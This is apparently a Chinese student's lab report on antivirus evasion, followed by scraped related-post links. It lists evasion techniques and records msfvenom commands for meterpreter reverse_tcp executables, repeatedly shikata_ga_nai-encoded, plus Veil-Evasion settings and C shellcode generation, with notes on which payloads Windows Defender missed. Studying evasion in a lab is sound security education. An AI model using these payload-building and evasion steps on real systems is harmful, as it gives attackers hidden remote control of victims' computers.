http://www.cnblogs.com/lxm20145215----/p/6602938.html

基础问题回答

(1)杀软是如何检测出恶意代码的?

  • 检查她的特征码
  • 特征行为
  • 也可以检测片面的特征。
    (2)免杀是做什么?
  • 首先清楚杀毒软件的杀毒原理。
  • 然后针对杀毒软件,自己相应的做出改变,防止杀毒软件检测出她的恶意行为。
    (3)免杀的基本方法有哪些?
  • 改变特征码
  • 加壳:压缩壳 加密壳
  • 有shellcode(像Meterpreter)
  • 用encode进行编码
  • 基于payload重新编译生成可执行文件
  • 改变行为
  • 尽量使用反弹式连接
  • 使用隧道技术
  • 加密通讯数据
  • 操作模式
  • 基于内存操作
  • 减少对系统的修改
  • 加入混淆作用的正常功能代码
  • 用其他语言进行重写再编译(veil-evasion)
  • 使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。
  • 使用社工类攻击,诱骗目标关闭AV软件。
  • 纯手工打造一个恶意软件

    实践总结与体会

  • 国产的杀毒软件质量差的一笔,比如江民杀毒和熊猫杀毒。
  • 做病毒病不需要太多的技术而杀毒相对来说要付出非常多的努力,我们要跟家中是保护自己的电脑。

    离实战还缺些什么技术或步骤?

    我们是通过工具完成的病毒的制作,以后再进一步的话就应该自己制作出来能够构造病毒的程序就好了。

    实践过程记录

msfvenom直接生成meterpreter可执行文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.115 PORT=1111 -f exe > test_mc.exe

windows自带的杀毒软剑直接杀掉了

Msfvenom使用编码器生成可执行文件

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.199.133 LPORT=1111 -f exe > mc-encoded.exe
来生成编码的可执行文件然后上传:

还是直接被杀掉:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 8 -b ‘\x00’ LHOST=192.168.199.133 LPORT=1111 -f exe > mc-encoded-8.exe
八次编码:

还是不行:

Veil-Evasion生成可执行文件

veil-evasion打开软件:
use python/meterpreter/rev_tcp
set LHOST 192.168.199.107
generate
mc-winmine
1
这次windows没有查出来直接放行了

上传到网站试试:

C语言调用Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.180 LPORT=208 -f c
生成一个c语言格式的Shellcode数组:

被杀掉

后续

实验指导

[http://git.oschina.net/wildlinux/NetSec/blob/master/ExpGuides/MAL_免杀原理与实践.md?dir=0&filepath=ExpGuides%2FMAL_免杀原理与实践.md&oid=33c5eba4957170076ea3af894b7df662e3fd4b11&sha=3197ea17455bacf495e6e3397a4d6d355c3c111c]

转载于:https://www.cnblogs.com/tuolemi/p/6585974.html

20145202马超《网络对抗》免杀相关推荐

  1. 20145202马超《网络对抗》Exp5MSF基础应用

    20145202马超<网络对抗>Exp5MSF基础应用 本实践目标,掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...

  2. 2018-2019-2 网络对抗技术 20165239Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165239 Exp3 免杀原理与实践 win10 ip地址 192.168.18.1 fenix ip地址为 192.168.18.128 (1)杀软是如何 ...

  3. 2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...

  4. 20145317 《网络对抗技术》免杀原理与实践

    20145317 <网络对抗技术>免杀原理与实践 免杀技术 技术分类 改变特征码 加壳:使用专业的加壳软件,掩盖特征码: 使用encode等进行编码,进行异或.+1.-1等类似操作改变特征 ...

  5. 2018-2019 20165208 网络对抗 Exp3 免杀原理与实践

    目录 2018-2019 20165208 网络对抗 Exp3 免杀原理与实践 实验内容 基础问题回答 实践过程记录 任务一:正确使用免杀工具或技巧 任务二:通过组合应用各种技术实现恶意代码免杀 任务 ...

  6. 2018-2019-2 20165209 《网络对抗技术》Exp3:免杀原理与实践

    2018-2019-2 20165209 <网络对抗技术>Exp3:免杀原理与实践 1 免杀原理与实验内容 1.1 免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中 ...

  7. 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp3 免杀原理与实践

    2019-2020-2 20175227张雪莹<网络对抗技术> Exp3 免杀原理与实践 目录 0. 基础知识 1. 实验内容 1.1 方法 1.1.1 正确使用msf编码器 1.1.2 ...

  8. 2018-2019-2 20165315 《网络对抗技术》Exp3 免杀原理与实践

    2018-2019-2 20165315 <网络对抗技术>Exp3 免杀原理与实践 一.实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion ...

  9. 20165214 2018-2019-2 《网络对抗技术》Exp3 免杀原理与实践 Week5

    <网络对抗技术>Exp3 免杀原理与实践 Week5 一.实验内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shell ...

最新文章

  1. 和12岁小同志搞创客开发:手撕代码,点亮LED灯
  2. 百万级商品数据实时同步,查询结果秒出
  3. ansible模块command、shell、raw、script
  4. 一个自己整理的HASH类
  5. .Net里一个用于驱动摄像头的类
  6. 1.Docker的安装以及配置国内源
  7. webpack基础第一篇(配置文件)
  8. html字体渐变颜色的设置颜色代码,使用CSS3实现字体颜色渐变的实现
  9. 使用haskell来解线性方程
  10. 服务器计时器、Windows 计时器和线程计时器
  11. Oozie自带MapReduce示例的运行
  12. vim 编辑器 bash文件测试
  13. nginx: too many open files
  14. linux配置erp访问端口_nginx配置相同端口号访问多个项目
  15. Clang checker类总结
  16. 输入一个整数n,统计1-n之间的奇数和。你有几种办法实现?
  17. Java实现XML格式化
  18. Google Chrome 66可以下载啦
  19. sql语句关联关系的+号
  20. 【c语言】字符及字符串

热门文章

  1. Oracle PL / SQL – ACOS函数示例
  2. 进度压缩: 赶工与快速跟进
  3. 有趣的超短python代码_神级 Coder 绝不犯的错误:为炫耀编出超短码
  4. Vue.js项目更换皮肤,同时支持多套皮肤
  5. 春节回家之旅-神州租车给您带来极致美好体验
  6. 零售通动销增幅400% 天猫双11推动品牌交易额狂翻20倍
  7. django学习阶段总结:urls说明
  8. 鸿蒙os bate,鸿蒙os beta版下载
  9. 电视服务器绑上电池信号强吗,路由器天线上绑电池真的有用吗?可别被抖音给骗了!...
  10. 真好用!一招轻松获取图片中鼠标点击处坐标